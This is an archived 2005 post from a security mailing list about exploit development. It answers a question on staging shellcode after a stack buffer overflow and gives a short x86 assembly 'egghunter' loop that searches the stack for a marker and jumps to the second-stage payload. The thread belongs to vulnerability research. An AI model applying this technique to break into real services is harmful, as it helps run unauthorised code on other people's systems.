Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: Re: Exploitation Help

Re: Exploitation Help

From: Felix Lindner <felix.lindner_at_nruns.com>
Date: Wed, 18 May 2005 10:20:39 +0200

On 17 May 2005 09:20:51 -0000
<ramatkal_at_hotmail.com> wrote:
>
> So, I am basically thinking, i overflow EIP with an address that JMP's -260
> to the beginning of the Authorization header. The Authorization header then
> contains my Stage1 shellcode that starts searching down the stack for my
> Stage2 shellcode which it will find about 2k down the stack in the GET
> request.....
>
> I hope somebody understands what the hell i am talking about....

You could easily implement a small code in the 250 byte buffer doing the
following:

        mov esi,esp
Loop:
        inc esi
        cmp [esi],0x12345678
        je found
        jmp short Loop
found:
        add esi,4
        jmp esi

and begin your "real" shellcode with 0x1234568 or any other pattern for that
matter.

cheers
Felix 

-- 
 Felix Lindner, CISSP | Senior Security Consultant, n.runs GmbH
         fx_at_nruns.com | +49 (0)171 740 20 62
A hacker does for love what others would not do for money.
Received on May 18 2005
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos